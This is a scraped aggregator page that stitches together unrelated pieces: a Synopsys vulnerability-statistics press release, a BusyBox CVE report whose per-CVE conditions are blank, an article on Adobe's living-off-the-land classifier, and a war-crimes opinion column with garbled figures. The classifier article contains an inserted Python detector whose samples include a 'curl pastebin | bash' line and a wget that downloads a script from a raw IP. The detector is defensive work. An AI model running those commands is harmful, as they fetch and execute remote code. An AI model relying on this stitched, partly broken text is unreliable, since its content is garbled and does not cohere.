MOUNTAIN VIEW, Calif., Nov. 16, 2021 /PRNewswire/ -- Synopsys, Inc. (Nasdaq: SNPS) today published "2021 Software Vulnerability Snapshot: An Analysis by Synopsys Application Security Testing Services," a report examining data from 3,900 tests conducted on 2,600 targets (i.e., software or systems) during 2020. The data, compiled by tests performed by Synopsys security consultants in our assessment centers for our customers, included penetration testing, dynamic application security testing, and mobile application security analyses, designed to probe running applications as a real-world attacker would.

Eighty-three percent of the tested targets were web applications or systems, 12% were mobile applications, and the remainder were either source code or network systems/applications. Industries represented in the tests included software and internet, financial services, business services, manufacturing, media and entertainment, and healthcare.

"Cloud-based deployments, modern technology frameworks, and the rapid pace of delivery is forcing security groups to react more quickly as software is released," said Girish Janardhanudu, vice president, security consulting at Synopsys Software Integrity Group. "With insufficient AppSec resources in the market, organizations are leveraging application testing services such as those Synopsys provides in order to flexibly scale their security testing. We've seen a heavy increase in assessment demand throughout the pandemic."

In the 3,900 tests conducted, 97% of the targets were found to have some form of vulnerability. Thirty percent of the targets had high-risk vulnerabilities, and 6% had critical-risk vulnerabilities. The results demonstrate that the best approach to security testing is to utilize the wide spectrum of tools available to help ensure an application or system is free from vulnerabilities. For example, 28% of the total test targets had some exposure to a cross-site scripting (XSS) attack, one of the most prevalent and destructive high- /critical-risk vulnerabilities impacting web applications. Many XSS vulnerabilities occur only when the application is running.


Other report highlights

2021 OWASP Top 10 vulnerabilities were discovered in 76% of the targets. Application and server misconfigurations were 21% of the overall vulnerabilities found in the tests, represented by the OWASP A05:2021 Security Misconfiguration category. And 19% of the total vulnerabilities found were related to the OWASP A01:2021 Broken Access Control category.

Insecure data storage and communication vulnerabilities plague mobile applications. Eighty percent of the discovered vulnerabilities in the mobile tests were related to insecure data storage. These vulnerabilities could allow an attacker to gain access to a mobile device either physically (i.e., accessing a stolen device) or through malware. Fifty-three percent of the mobile tests uncovered vulnerabilities associated with insecure communications.

Even lower-risk vulnerabilities can be exploited to facilitate attacks. Sixty-four percent of the vulnerabilities discovered in the tests are considered minimal-, low-, or medium-risk. That is, the issues found are not directly exploitable by attackers to gain access to systems or sensitive data. Nonetheless, surfacing these vulnerabilities is not an empty exercise, as even lower-risk vulnerabilities can be exploited to facilitate attacks. For example, verbose server banners, found in 49% of the tests, provide information such as server name, type, and version number, which could allow attackers to perform targeted attacks on specific technology stacks.

An urgent need for a software Bill of Materials. Of note was the number of vulnerable third-party libraries in use, found in 18% of the penetration tests conducted by Synopsys Application Testing Services. This corresponds with the 2021 OWASP Top 10 category A06:2021 Use of Vulnerable and Outdated Components. Most organizations typically use a mix of custom-built code, commercial off-the-shelf code, and open source components to create the software they sell or use internally. Often those organizations have informal, or no, inventories detailing exactly what components their software is using, as well as those components' licenses, versions, and patch status. With many companies having hundreds of applications or software systems in use, each themselves likely having hundreds to thousands of different third-party and open source components, an accurate, up-to-date software Bill of Materials is urgently needed to effectively track those components.

To learn more, download the "2021 Software Vulnerability Snapshot: An Analysis by Synopsys Application Security Testing Services," or read the blog post.

About the Synopsys Software Integrity Group

Synopsys Software Integrity Group helps development teams build secure, high-quality software, minimizing risks while maximizing speed and productivity. Synopsys, a recognized leader in application security, provides static analysis, software composition analysis, and dynamic analysis solutions that enable teams to quickly find and fix vulnerabilities and defects in proprietary code, open source components, and application behavior. With a combination of industry-leading tools, services, and expertise, only Synopsys helps organizations optimize security and quality in DevSecOps and throughout the software development life cycle. Learn more at http://www.synopsys.com/software.

About Synopsys

Synopsys, Inc. (Nasdaq: SNPS) is the Silicon to Software partner for innovative companies developing the electronic products and software applications we rely on every day. As an S&P 500 company, Synopsys has a long history of being a global leader in electronic design automation (EDA) and semiconductor IP and offers the industry's broadest portfolio of application security testing tools and services. Whether you're a system-on-chip (SoC) designer creating advanced semiconductors, or a software developer writing more secure, high-quality code, Synopsys has the solutions needed to deliver innovative products. Learn more at http://www.synopsys.com.

Editorial Contact: Liz Samet, Synopsys, Inc., 703-657-4218, esamet@synopsys.com


View original content: https://www.prnewswire.com/news-releases/synopsys-research-finds-vulnerabilities-in-97-of-applications-36-impacted-by-critical--or-high-risk-vulnerabilities-301425386.html

SOURCE Synopsys, Inc.

Continued here:

Synopsys Research Finds Vulnerabilities in 97% of Applications, 36% Impacted by Critical- or High-Risk Vulnerabilities - Yahoo Finance

Claroty and JFrog discover 14 vulnerabilities in Busybox – SecurityBrief New Zealand

Team82 and JFrog have announced the discovery, by using static and dynamic techniques, of 14 vulnerabilities affecting the latest version of BusyBox.

Typically found in embedded devices with limited memory and storage resources, BusyBox is marketed as the Swiss Army Knife of embedded Linux. It's a software suite of useful Unix utilities, known as applets, packaged as a single executable file.

Busybox can be found on many OT and IoT devices, including popular programmable logic controllers (PLCs), human-machine interfaces (HMIs), and remote terminal units (RTUs) - many of which now run on Linux.

As part of a commitment to improving open-source software security, Claroty's Team82 and JFrog collaborated on a vulnerability research project examining BusyBox.

To research BusyBox, they used static and dynamic analysis approaches. First, a manual review of the BusyBox source code was conducted in a top-down approach (following user input up to specific applet handling). They also looked for obvious logical or memory corruption vulnerabilities.

The next approach was fuzzing. They compiled BusyBox with ASan and implemented an AFL harness for each BusyBox applet. Each harness was subsequently optimised by removing unnecessary parts of the code, running multiple fuzzing cycles on the same process (persistent mode), and running multiple fuzzed instances in parallel.

Details of the vulnerabilities

According to the collaboration, since the affected applets are not daemons, each vulnerability can only be exploited if the vulnerable applet is fed with untrusted data - usually through a command-line argument.

Specifically, these are the conditions that must occur for each vulnerability to be triggered:

CVE-2021-42373:

CVE-2021-42374:

CVE-2021-42375:

CVE-2021-42376:

CVE-2021-42377:

CVE-2021-42378, CVE-2021-42386:

"We started from fuzzing all the daemon applets, including HTTP, Telnet, DNS, DHCP, NTP etc. Many code changes were required in order to effectively fuzz network-based input," the companies explain.

"For example, the main modification we performed was to replace all recv functions with input from STDIN to support fuzzed inputs. Similar changes were done when we fuzzed non-server applets as well."

Claroty's Team82 and JFrog prepared a couple of examples for each applet and ran hundreds of fuzzed BusyBox instances for a few days.

"This gave us tens of thousands of crashes to evaluate. We had to create classes of crashes with the same root cause to help reduce the volume of crashes we had in our sample set. Later, we minimised each group representative to work with a small subset of unique crash inputs," they say.

To fulfil these tasks, the team developed automatic tooling that digested all crash data and classified it based on the crash analysis report, which mainly includes the crash stack trace, registers, and assembly code of the relevant code area. For example, they merged cases with similar crash stack traces because they usually had the same problematic root cause.

Finally, the team researched each unique crash and minimised its input vector in order to understand the root cause, which allowed them to create a proof-of-concept that exploits the vulnerability responsible for the crash. In addition, they tested their PoCs against several BusyBox versions to understand when the bugs were introduced to the source code.

Threat Analysis and mitigation advice

To assess the threat level posed by these vulnerabilities, Team82 and JFrog inspected JFrog's database of more than 10,000 embedded firmware images. The team found that 40% of them contained a BusyBox executable file that is linked with one of the affected applets, making these issues extremely widespread among Linux-based embedded firmware.

According to Claroty, all 14 vulnerabilities have been fixed in BusyBox 1.34.0 and users are urged to upgrade immediately.

See more here:

Claroty and JFrog discover 14 vulnerabilities in Busybox - SecurityBrief New Zealand

Open Source Project Aims to Detect Living-Off-the-Land Attacks – Dark Reading

Attackers who use standard system commands during a compromise, a technique known as living off the land (LotL), to avoid detection by defenders and endpoint security software may find their activities in the spotlight if a machine learning project open sourced by software firm Adobe this week bears fruit.

The project, dubbed LotL Classifier, uses supervised learning and an open source dataset of real-world attacks to extract features of specific commands, and then classifies each command based on features extracted using human analysis as a model. Those features are used to determine whether the command is good or bad and to label the command with a set of tags that can be used for anomaly detection.

Each feature by itself, such as accessing /etc/shadow, where password hashes are typically stored, or access to Pastebin, may seem suspicious, but usually is not malicious, says Andrei Cotaie, technical lead for security intelligence and engineering at Adobe.

"On their own, most of the tags or tag types have a high FP [false positive] rate, but combining them and feeding this combination through the machine learning algorithm can generate a higher rate of accuracy in the classifier," he says, adding that Adobe has benefited from the machine learning model. "The LotL Classifier is operational in our environment and based on our experience, by suppressing reoccurring alerts, the LotL Classifier generates a few alerts per day."

Living off the land has become a widely used attacker tactic when targeting enterprises. Malware attacks are just as likely to begin with a PowerShell command or Windows Scripting Host command, two common administrative tools that can escape notice, as with a more traditional malware executable. In 2019, CrowdStrike's incident response group found that "malware-free" attacks, another name for LotL, surpassed malware-based incidents. By the summer of 2021, they accounted for more than two-thirds of investigated incidents.

"Attackers are increasingly attempting to accomplish their objectives without writing malware to the endpoint, using legitimate credentials and built-in tools (living off the land) which are deliberate efforts to evade detection by traditional antivirus products," CrowdStrike stated in its "2021 Threat Hunting Report."

The LotL Classifier uses a supervised machine learning approach to extract features from a dataset of command lines and then creates decision trees that match those features to the human-determined conclusions. The dataset combines "bad" samples from open source data, such as industry threat intel reports, and the "good" samples come from Hubble, an open source security compliance framework, as well as Adobe's own endpoint detection and response tools.

The feature extraction process generates tags focused on binaries, keywords, command patterns, directory paths, network information, and the similarity of the command to known patterns of attack. Examples of suspicious tags might include a system-command execution path, a Python command, or instructions that attempt to spawn a terminal shell.

"The feature extraction process is inspired by human experts and analysts: When analyzing a command line, people/humans rely on certain cues, such as what binaries are being used and what paths are accessed," Adobe stated in its blog post. "Then they quickly browse through the parameters and, if present in the command, they look at domain names, IP addresses, and port numbers."

Using those tags, the LotL Classifier uses a random-forest tree model that combines several decision trees to determine whether the code is malicious or legitimate.
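To make the tag-then-combine idea concrete, here is a small tag extractor and combination rule written for this article; it is not code from Adobe's LotL Classifier, and the tag names, rules and the "two or more risky tags" threshold that stands in for the random-forest stage are my own assumptions. The sample command lines are constructed (203.0.113.7 is a documentation address).

```python
import re
from typing import Dict, List

# Feature families follow the article (binaries, keywords, paths, network
# information); the concrete tags and rules are assumptions for this example.
INTERPRETERS = {"python", "python2", "python3", "perl", "ruby"}
NET_TOOLS = {"curl", "wget", "nc", "ncat"}
SENSITIVE_PATHS = ("/etc/shadow", "/etc/sudoers", "/root/.ssh")
PASTE_SITES = {"pastebin.com"}
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://([a-z0-9.-]+)(?::(\d{2,5}))?", re.I)
# A shell name after the leading binary: pipe target, -c payload, spawn argument.
SHELL_RE = re.compile(r"(?:^|[\s/\"'|;&(])(sh|bash|dash|zsh)\b")

# Tags that, only in combination, push a command line towards "bad".
RISKY = {"INTERPRETER", "NET_TOOL", "SENSITIVE_PATH", "SHELL_SPAWN", "PASTE_SITE", "NET_IP"}

# Constructed samples: two routine admin/dev commands, two that combine cues.
SAMPLES = [
    "cat /etc/shadow",
    "python3 manage.py migrate",
    "curl -s https://pastebin.com/raw/ABC123 | bash",
    "wget http://203.0.113.7:8080/update.sh -O /tmp/u.sh",
]


def extract_tags(cmdline: str) -> List[str]:
    """Return a sorted list of tags describing one command line."""
    cmdline = cmdline.strip()
    if not cmdline:
        return []
    head, _, rest = cmdline.partition(" ")
    binary = head.rsplit("/", 1)[-1]          # strip any directory prefix
    tags = {f"BIN:{binary}"}
    if binary in INTERPRETERS:
        tags.add("INTERPRETER")
    if binary in NET_TOOLS:
        tags.add("NET_TOOL")
    if any(p in cmdline for p in SENSITIVE_PATHS):
        tags.add("SENSITIVE_PATH")
    if SHELL_RE.search(rest):
        tags.add("SHELL_SPAWN")
    for host, port in URL_RE.findall(cmdline):
        if not IPV4_RE.fullmatch(host):
            tags.add(f"NET_DOMAIN:{host.lower()}")
            if host.lower() in PASTE_SITES:
                tags.add("PASTE_SITE")
        if port:
            tags.add(f"NET_PORT:{port}")
    for ip in IPV4_RE.findall(cmdline):
        tags.add("NET_IP")
        tags.add(f"NET_IP:{ip}")
    return sorted(tags)


def classify(cmdline: str) -> Dict[str, object]:
    """Stand-in for the model stage: flag "bad" only when risky tags co-occur,
    so a single cue (reading /etc/shadow during normal administration, or
    simply running an interpreter) does not raise an alert on its own."""
    tags = extract_tags(cmdline)
    risky = sorted(t for t in tags if t in RISKY)
    label = "bad" if len(risky) >= 2 else "good"
    return {"tags": tags, "risky": risky, "label": label}


def run_samples() -> Dict[str, str]:
    """Label every constructed sample; returns {command_line: label}."""
    return {cmd: str(classify(cmd)["label"]) for cmd in SAMPLES}


if __name__ == "__main__":
    for cmd in SAMPLES:
        r = classify(cmd)
        print(f"{r['label']:4}  {cmd}\n      tags={r['tags']}")
```

The two "good" samples each carry one risky tag, which is exactly the single-tag false positive the article describes; the "bad" ones are flagged by the combination, not by any individual cue.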

"Interestingly, these stealthy moves are exactly why it's often very difficult to determine which of these actions are a valid system administrator and which are an attacker," the company stated in a blog post.

The machine learning model can benefit companies in a variety of threat-analysis pipelines, says Adobe's Cotaie. Threat hunters could use it as a local service or the model could process global security information and event management (SIEM) data to find anomalies by feeding another open source tool released by Adobe, the One-Stop Anomaly Shop (OSAS). The model has a component for Windows systems and a separate one for Linux, but it's otherwise context independent.

"The classifier is integrated into ... One Stop Anomaly Shop (OSAS)," he says. "The parent project can model local or group system behavior using many context-dependent features and its anomaly detection features are complementary to the LotL classifier model."

Read the original post:

Open Source Project Aims to Detect Living-Off-the-Land Attacks - Dark Reading

Culture of impunity – The News International

Many rights activists might have been confused by an unashamed justification offered by the US ruling elite for a March 2019 American air strike on Syrians that killed around 80 people, mostly women and children. But for those sitting in the power corridors of Washington, it is business as usual.

The lethal March 18 strike, targeting the town of Baghuz on the Euphrates River, had triggered calls for an inquiry into the matter. The area which was targeted by the strike forms the Syrian-Iraq border, where members of the Syrian Democratic Forces (SDF), with US air support, were besieging the last few IS fighters in the war-torn Arab republic which was under the decades-long rule of the al-Assad family.

Justifying the action, the US Central Command argued that because some women and children had taken up arms for IS, whether through indoctrination or choice, they could not strictly be classified as civilians. It claimed the context for the airstrikes was a desperate last stand by IS. "The Isis pocket included thousands of fighters and family members including women and children," said Captain Bill Urban, the Central Command spokesman.

The remaining fighters including some women and child combatants, along with many Isis family members, including some who were likely held against their will, decided to make a determined stand in an area that included buildings, tunnels and cliffs. Multiple entreaties to Isis to allow family members to depart the area were rebuffed, and thousands of family members remained in the area of the fighting.

Recalling the incident, Urban claimed that on the morning of March 18, IS fighters launched a counterattack on SDF positions that lasted several hours, during which an SDF position was in danger of being overrun, and US special forces called in an airstrike. He said that they were unaware that a drone with a high-definition video footage was in the area and relied on a standard definition feed from another drone.

According to the Central Command account, the drones over Baghuz had used all their Hellfire missiles, so the air support available came from F-15s, which dropped three bombs. The bombs killed at least 16 IS fighters, according to the US military assessment. It also confirmed four civilian deaths.

These claims of the US military officials fly in the face of the allegations levelled by some current and former Pentagon officials who believe there had been a cover-up of a likely war crime. They were not the only ones to cast doubt over the way the strike was carried out; according to Western media reports, the Air Force lawyer, Lt Col Dean Korsak, had also taken up the matter with the Pentagon inspector general, but the subsequent report made no mention of the strike. This forced Korsak to send details of the incident to the US Senate Armed Services Committee. It seems that Korsak was apprehensive about possible retaliation from military officials for sending this to the committee. He expressed this fear in his correspondence with the committee.

According to the emails obtained by the New York Times, Korsak wrote, "I'm putting myself at great risk of military retaliation for sending this." The lawyer reportedly accused senior ranking US military officials of intentionally and systematically circumventing the deliberate strike process. Gene Tate, a civilian analyst in the inspector general's office, who complained about the lack of action, was forced out of his job.

It is quite unfortunate that anyone who tries to expose the wrongdoing of the military industrial complex and warmongers is either sent packing or punished to teach lessons to others. Bradley Manning was punished for speaking truth to power. Edward Snowden had to flee the most democratic country of the world after revealing the machinations of the US ruling elite while Julian Assange is suffering from inhumane treatment for challenging the mighty American political leadership and US allies.

While conscientious US citizens and dissenting voices in other parts of the Western capitalist world suffer the consequences of daring to challenge the mighty rulers of the modern world, war criminals like Henry Kissinger, George W Bush, Tony Blair and their acolytes strut around the world lecturing people on peace. Kissinger was responsible for military coups in a number of developing countries, which stoked chaos and unrest, leading to brutal killings of thousands of people.

Tony Blair concocted lies about the Iraqi weapons of mass destruction and still unashamedly justifies his immoral stance on the invasion of the Arab country by the US. Bush's assertions regarding Iraq also turned out to be apocryphal, but he still has the moral audacity to lecture states about the importance of morality in international affairs.

Even before the 2004 Iraq invasion, the worst war crimes were committed against the people of Iraq. More than 500,000 children died because of the inhumane sanctions imposed on the country at the behest of the US and other Western powers. The sanctions forced a few conscientious Americans and UN officials to voice concern over the plight of Iraqi people, but the civilised Western democratic world remained unmoved. Former US secretary of state Madeleine Albright unabashedly justified these killings of Iraqi children. The US invasion added to the country's woes, plunging the country into a sectarian frenzy.

The aggression and ensuing civil war claimed more than 2.5 Iraqi lives besides destroying its infrastructure, causing its plundering by Washington and its allies, and tearing down its social fabric. Since those who played havoc with the lives of Iraqis remained unaccounted for, they were encouraged to sow chaos in Syria, Libya and other parts of the world as well.

Iraq was not the first country to be invaded and destroyed on a false claim; many in the past were also devastated on the basis of deception and fabrication. Lies were invented or small incidents were blown out of proportion to achieve ulterior motives and obnoxious goals. For instance, the threat of the Vietcong was exaggerated to justify an invasion of one of the world's poorest countries in the 1960s.

The offer of Vietnamese communist groups to hold polls in the north was rejected. The country was ruthlessly bombed, killing more than three million people. Laos and Cambodia were not spared either. The three conflicts are estimated to have caused more than five million deaths; millions others were maimed or wounded. No one was held accountable for such crimes.

This lack of accountability is to be blamed on the sense of impunity that the American ruling class has been enjoying for decades. It is this sense which prevents Washington from accepting the jurisdiction of the International Criminal Court (ICC), prompting it to threaten the court and declaring the UN irrelevant if the global body dares to deviate from the line drawn by the mighty state of America. This strange belief in American exceptionalism prompts the US to raise a hue and cry over war crimes in several parts of the world but prevents it from sending its own soldiers to places where they can be prosecuted.

Some critics believe if an impartial inquiry is conducted into all the conflicts that occurred during the last three hundred years, a number of American presidents and senior officials would be in the dock, answering for the wrongdoing that they committed while in power. Applying the principles of war crimes and strengthening the ICC could be one of the ways to end this culture of impunity that seems to have penetrated in all sections of American life.

The writer is a freelance journalist.

Email: egalitarianism444@gmail.com

Original post:
Culture of impunity - The News International